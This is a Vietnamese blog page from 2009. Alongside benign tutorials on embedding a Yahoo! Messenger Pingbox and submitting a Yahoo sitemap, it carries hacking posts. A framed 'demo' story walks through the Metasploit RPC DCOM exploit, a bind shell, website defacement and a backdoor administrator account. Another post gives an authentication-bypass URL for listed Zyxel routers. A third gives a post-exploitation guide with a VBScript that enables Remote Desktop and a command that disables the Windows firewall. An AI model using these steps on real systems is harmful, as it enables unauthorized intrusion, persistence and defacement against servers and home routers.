Những tam giác tình yêu khuynh đảo màn ảnh Hàn. Park Shin Hye, Yoon Eun Hee, So Yi Hyun... khiến khán giả đau đầu theo các cuộc tình rắc ...
Thứ Sáu, 30 tháng 1, 2009
Nhúng Yahoo! Messenger vào web cá nhân
Bước 1: Vào trang Pingbox và nhấn nút Tạo Pingbox
Bước 2:
+ Hãy click chọn ảnh nền, màu chữ, font chữ cho Pingbox sao cho phù hợp với thiết kế website của bạn. Các thay đổi sẽ được cập nhật tại Pingbox mẫu ở phía tay phải để bạn có thể xem lại ngay.
+ Hãy chọn lời chào hỏi mặc định khi bạn đang Online hoặc tin nhắn lại khi bạn đang Ofline. Bạn có thể chọn các câu có sẵn hay tự tạo một câu mới.
* Mẹo: Nếu khi gõ tiếng Việt trực tiếp trên trang Pingbox mà bạn không nhận được hiển thị tiếng Việt thì hãy mở Notepad lên, gõ dòng chữ muốn hiển thị vào Notepad (đương nhiên là font Unicode). Sau đó copy dòng chữ đã gõ và paste vào ô Chào hỏi hoặc Tin nhắn của Pingbox.+ Chọn tên hiển thị trên Pingbox.
+ Chọn tên của Pingbox trong mục Lưu Pingbox dưới tên. Lưu ý là danh sách khách vào website của bạn mà đang đăng nhập vào Yahoo! sẽ được hiển thị trong danh sách Messenger dưới tên nhóm là tên của Pingbox mà bạn đã chọn.
Khi đã vừa ý với Pingbox của mình bạn nhấn nút Tiếp.
Bước 3:
+ Hãy chọn cách tạo mã HTML - Chỉ mã thôi hoặc tạo mã cho Friendster và Blogger (dùng riêng cho các blog này) bằng cách click vào tab tương ứng.
+ Chọn kích cỡ mà Pingbox sẽ hiển thị trên website của bạn. Bạn có thể chọn kích thước định sẵn hoặc chọn kích thước tùy ý.
+ Việc cuối cùng là click vào nút Copy vào clipboard để copy đoạn code vừa được cung cấp vào clipboard.
Bước 4: Bước còn lại là trên website (hay blog) của bạn:
Hãy paste đoạn code (mã HTML) đã copy vào vị trí bạn sẽ bố trí khung chat Pingbox trên website của bạn. Sau đó upload lên host để cập nhật lại website.
Để sử dụng pingbox, bạn hãy đăng nhập vào Yahoo! Messenger, lúc này trên khung pingbox sẽ hiển thị trạng thái Online của bạn và từ bây giờ bạn có thể thoải mái trao đổi với bạn bè, khách viếng tham ngay trên chính blog hoặc website của mình.
Bảo Bảo
Thứ Tư, 28 tháng 1, 2009
Cách tạo sitemap cho Yahoo!
Click lên start > Run > chọn chương trình Notepad.
Copy các URL bạn muốn Yahoo đánh chỉ mục vào file trên, mỗi URL là một hàng.
Lưu file với tên urllist.txt và upload lên thư mục web.
Truy cập vào địa chỉ: https://siteexplorer.search.yahoo.com/
Thêm website hoặc blog của bạn vào Yahoo! bằng cách click vào nút Add My Site
Yahoo! sẽ yêu cầu bạn đăng nhập bằng tài khoản của mình, hãy đăng nhập bằng tài khoản Yahoo! của bạn.
Click lên nút Authenticate sau khi đăng nhập thành công.
Để xác nhận chủ quyền website, Yahoo! sẽ yêu cầu bạn add một thể Meta hoặc upload 1 file HTML lên website của mình.
Upload file hoặc thêm thẻ Meta như yêu cầu của Yahoo!, sau đó bạn click vào nút Ready to Authenticate.
Trong trường hợp sử dụng Blog, bạn nên thêm thẻ Meta sẽ thuận tiện hơn.Xong ! Giờ thì bạn chỉ cần chờ đợi Yahoo! đánh chỉ mục website mình mà thôi.
Thứ Hai, 19 tháng 1, 2009
Ếch Con giở chiêu đột nhập vào WebServer của Tư Nòng Nọc
Lưu ý : Bài viết này là demo chứng minh cho tầm quan trọng của việc quản trị mạng chứ không phải hướng dẫn các bạn đi "chôm" pasword ! Đối với vai trò 1 Administrator thì không phải build up một network cho chạy là xong, mà phải kiểm soát và phải có phương hướng bảo mật cho network của mình. (Các tên nhân vật và tình huống câu chuyện là do tôi hư cấu)
****
Như các bạn đã theo dõi bộ truyện nhiều tập "CHÔM PASSWORD VÀ ĐỌC LÉN MAIL CỦA SẾP", đã biết qua các nhân vật như :
- Ếch Con là lính của Sếp Hai Nhái : thích tìm tòi học hỏi những cái mới và thích châm chọc những người tự cao tự đại.
- Tư Nòng Nọc là lính của Sếp Ba Cóc : thích khoe khoang mặc dù không biết gì, giang hồ có câu "Điếc hay ngóng, ngọng hay nói" thì Tư Nòng Nọc đã có 7 phần trong đó
****
Cũng vào một dịp nhậu nhẹt tại quán Thu Nở có đầy đủ các nhân vật Hai Nhái, Ếch Con, Ba Cóc, Tư Nòng Nọc. Đang vào tháng 9 nên Phan Thiết có đặc sản là cá Tắc Kè và cá Bò hòm (*). Vô được 5-6 chai ken thì Hai Nhái nhớ "bài lai" vụ laptop của mình shutdown lâu lắc và hay đòi restart liền hỏi Ếch. Ếch ta trả lời là do Windows update các bản vá lỗi cho an toàn nên phải restart lại mới ... "ép phê". Nghe đến đây thì Tư Nòng Nòng nọc "xìiiii" 1 tiếng rõ to và nói rằng "chú chỉ khéo vẽ trò, mình cài Windows xong rồi đặt password thật khó là không ai phá được. Như bản thân anh cài máy "con server" ở cơ quan cũng có update gì đâu mà vẫn chạy tốt. Hôm nào chú sang anh giở vài chiêu xem có làm ăn gì được không vì anh đặt password ... dài lắm, haha". Ếch Con nghĩ thầm "hãy đợi đấy, rồi có lúc ông anh sẽ thấy việc quan trọng của update. Nu! pododi (**)".
Bẵng đi một thời gian, Ếch Con lại có dịp sang cơ quan của Ba Cóc. Cũng như lần trước, nó cũng xin một sợi cable mạng để vào Internet. Nó nhớ lại vụ hôm trước và truy cập vào WebServer của cơ quan Ba Cóc (nó biết được IP nội bộ không khó vì khi nó dùng lệnh "net view" thì thấy có computer tên là WebServ). Hmmm, gớm nhỉ, "Security by Tư Nòng Nọc" luôn cơ à, nếu như theo lời Tư Nòng Nọc không update Windows thì hãy xem thằng Ếch này đây.
- Thằng Ếch liền download Meta Framework 3.1 để chuẩn bị "ảo thuật" đột nhập vào WebServer.
- Sau khi download xong thì nó liền Install vào.
- Trong quá trình cài đ8ạt Metasploit Framework 3.1 thì có yêu cầu cài thêm Nmap, thằng Ếch cài luôn.
- Finish rồi, chạy chương trình thôi
- Metasploit Framework đang khởi động.
- Ui chu choa, giao diện ngầu quá đi
- Sau khi chương trình start xong, nó liền search 1 cái lỗi mà nó biết qua trang milw0rm.com là lỗi "rpc dcom".
- Đây rồi, click vô 1 cái.
- Đây rồi Windows NT/2000/XP/2003 đều có thể "chơi" được, click forward 1 cái.
- Thằng Ếch nó chọn shell_bind_tcp, forward cái nữa.
- Điền IP của Webserver vào, mọi thứ để default rồi forward tiếp.
- Chương trình detect, đợi thành công thì nhấn apply 1 cái.
- Oh yeah ! thằng ếch nó cười nham hiểm vì thấy phiên làm việc (session) đã được khởi tạo.
- Thằng Ếch liền chọn Interact Session.
- Haha, lấy được CMD rồi, giở chiêu quậy phá thôi.
- Ếch dùng lệnh "dir" để xem đĩa C:\ của Server và tạo 1 folder "Server_bi_hack" để cảnh báo.
- Chưa đủ trò quậy phá nó liền sữa trang chủ của website thành nội dung "Tư Nòng Nọc bị đứt đuôi rồi"
- Truy cập lại xem cái coi, oh ! đẹp quá đi Mất tiêu cái "Security by Tư Nòng Nọc" rồi.
- Ngoài ra nó còn tạo thêm 1 user tên ech và cho vào group Administratos luôn. Chà, nó có thâm ý gì đây nhỉ
- Oh ! nó chạy chương trình Remote Desktop Connection, thì ra là nó muốn quản lý Server bằng giao diện luôn. hihi
- Nó nhập IP WebServer vào rồi chọn Connect
- Nó nhập user ech và password vừa tạo vào.
- Tèn ten ten ten, đăng nhập được vào Server với quyền Administrator luôn rồi. Chiến này Tư Nòng Nọc khổ dài dài rồi.
Hihi, vậy là Tư Nòng Nọc hết dám khoe khoang lộn chỗ rồi phải không các bạn. Và các bạn cũng đã thấy cái hại của việc không cập nhật bản vá lỗi thường xuyên rồi đấy nhé, sau này các bạn nhớ update windows thường xuyên nha.
----------------
Bugs lỗi trên ADSL Zyxel
Hầu hết các khách hàng sử dụng Internet của FPT Telecom thường được tặng Router ADSL Zyxel. Nhưng trên Router ADSL Zyxel vẫn còn một bugs lỗi khá lâu vẫn còn tác dụng khai thác. Bugs có thể Bypass authentication reset modem và upload firmware khác.
Truy cập vào Router với đường dẫn: http://x.x.x.x/rpFWUpload.html (phân biệt hoa thường)
Loại Router có thể khai thác:
- ZyXEL Prestige 600
- ZyXEL Prestige 645R-A1
- ZyXEL Prestige 650H
- ZyXEL Prestige 650HW
- ZyXEL Prestige 650HW-31
- ZyXEL Prestige 650R
- ZyXEL ZyNOS IS.3, IS.5, V3.40(ES.5), 3.40
---------
* Trong ví dụ này tôi sử dụng ADSL Router ZyXEL Prestige 600BẬT TÍNH NĂNG REMOTE DESKTOP TỪ XA
Khi tấn công vào 1 server, bằng 1 cách nào đó bạn đã telnet được vào server với quyền administrator, với quyền Administrator qua telnet bạn đã có toàn quyền quản lý server từ dòng lệnh tuy nhiên bạn vẫn muốn quản lý qua giao diện, vì thế ta phải bật tính năng remote desktop lên.
Trong ví dụ này Hiếu sử dụng Server là Windows Server 2003 đã nâng cấp thành Domain Controller, máy Attacker sử dụng Backtrack3
B1. Trên Server kiểm tra remote desktop chưa bật.
B2. Trên máy Attacker, telnet vào Server
B3. Chuẩn bị sẵn file VBscript để enable Remote Desktop
Nội dung file VBScript remote.vbs
machine = "." cimv2_string = "WINMGMTS:" & "\\" & machine & "\root\cimv2" query = "select * from Win32_TerminalServiceSetting" value_to_set = 1 ' 0=off, 1=on set cimv2 = GetObject( cimv2_string ) set items = cimv2.ExecQuery( query ) for each item in items item.SetAllowTSConnections( value_to_set ) next |
B4. Dùng lệnh "copy con" để tạo tiệp tin remote.vbs trên Server. Dán nội dung file remote.vbs đã chuẩn bị sẵn và save lại.
B5. Dùng lệnh dir kiểm tra
B6. Chạy file remote.vbs để bật remote desktop.
B7. Dùng lệnh "netstat -an" kiểm tra port 3389 đã được lắng nghe. (3389 là port Remote desktop)
B8. Trên Server kiểm tra tính năng Remote Desktop đã được bật
B9. Tắt firewall của Server
Sử dụng lệnh : Netsh firewall set opmode disable
B10. Từ máy attacker, chạy remote desktop client để kết nối với Server.
Sử dụng lệnh rdesktop [hostname]
B11. Nhập username/password của Administrator
B12. Truy cập thành công với quyền Administrators
Bài đăng phổ biến
-
There a lot of free web hosting providers on the market but you don’t know which is the best that meets your needs? Well, here we go. After...
-
Catching up on a event we have Bang Eun Young at a Kia Motors event for their Pride car. As always she has a great smile (along with her eye...
-
Though the response of NaNa wasn’t that bad, but I think this beautyleg girl named Eva is quite killer and destroys NaNa xD As well I think ...